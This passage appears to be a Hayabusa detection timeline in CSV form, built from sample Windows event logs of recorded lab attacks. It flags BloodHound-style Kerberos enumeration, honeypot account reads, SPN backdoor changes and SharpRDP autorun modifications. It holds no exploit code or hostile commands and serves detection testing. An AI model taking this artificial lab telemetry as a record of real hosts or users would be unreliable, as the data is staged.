0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 